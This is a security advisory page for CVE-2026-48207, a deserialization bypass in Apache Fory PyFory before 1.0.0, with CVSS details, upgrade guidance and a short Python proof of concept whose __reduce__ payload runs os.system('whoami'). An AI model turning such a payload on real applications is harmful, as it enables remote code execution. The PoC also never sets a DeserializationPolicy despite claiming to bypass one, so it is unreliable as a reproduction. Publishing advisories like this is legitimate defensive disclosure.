Security Vulnerability Report
中文
CVE-2026-48207 CVSS 9.8 CRITICAL

CVE-2026-48207

Published: 2026-05-21 17:16:22
Last Modified: 2026-05-21 19:16:54
Source: [email protected]

Description

Deserialization of untrusted data in Apache Fory PyFory. PyFory's ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory: from before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Apache Fory < 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pyfory import os # Define a malicious class that executes a command when reduced class MaliciousPayload: def __reduce__(self): # This returns a tuple (callable, args) that will be executed upon deserialization return (os.system, ('whoami',)) # Create an instance and serialize it (simulating attacker-controlled data) original_data = MaliciousPayload() malicious_data = pyfory.serialize(original_data) # Scenario: The target application deserializes the data # Vulnerable condition: Python-native mode, strict mode disabled # The ReduceSerializer bypasses the DeserializationPolicy checks here try: # In a vulnerable version (< 1.0.0), this bypasses the policy and executes 'whoami' result = pyfory.deserialize(malicious_data, mode='python-native', strict=False) print("Deserialization successful. Code executed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-48207", "sourceIdentifier": "[email protected]", "published": "2026-05-21T17:16:21.857", "lastModified": "2026-05-21T19:16:53.700", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of untrusted data in Apache Fory PyFory. PyFory's ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes.\n\nThis issue affects Apache Fory: from before 1.0.0.\n\nMitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://fory.apache.org/security/#cve-2026-48207-pyfory-reduceserializer-deserializationpolicy-bypass", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/21/10", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.